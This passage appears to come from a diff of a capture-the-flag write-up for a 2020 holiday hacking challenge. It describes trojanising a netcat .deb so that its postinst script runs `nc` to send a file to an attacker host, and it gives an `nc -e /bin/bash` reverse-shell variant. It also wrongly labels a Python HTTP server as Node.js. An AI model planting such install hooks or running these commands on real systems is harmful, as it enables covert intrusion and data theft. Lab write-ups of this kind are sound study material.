joergschwarzwaelder/hhc2020/Objective-9/README.md

 17:27:18.098422 IP 10.6.6.35.50340 > 10.6.0.2.80: Flags [S], seq 2451495177, win 64240, options [mss 1460,sackOK,TS val 2516141758 ecr 0,nop,wscale 7], length 0
 17:27:18.098452 IP 10.6.0.2.80 > 10.6.6.35.50340: Flags [R.], seq 0, ack 2451495178, win 0, length 0
 ```

 A Node.js HTTP server was started using  `python3 -m http.server 80` and it logged the request:

     10.6.6.35 - - [12/Dec/2020 17:37:02] "GET /pub/jfrost/backdoor/suriv_amd64.deb HTTP/1.1" 404 -

 On the device the Debian package `netcat-traditional_1.10-41.1ubuntu1_amd64.deb` was found.
-This package was modified to include this line in the postinst script:
+This package was modified to include a netcat command in the postinst script to send the text file to our local host:
 `/bin/nc 10.6.0.2 4444 < /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt`

 By opting for
 `/bin/nc 10.6.0.2 4444 -e /bin/bash`
 an interactive reverse shell can be acquired.
 ```

 guest@faf32a4d4929:~/debs$ mkdir tmp
 guest@faf32a4d4929:~/debs$ dpkg-deb -R netcat-traditional_1.10-41.1ubuntu1_amd64.deb tmp
 guest@faf32a4d4929:~/debs$ vi tmp/DEBIAN/postinst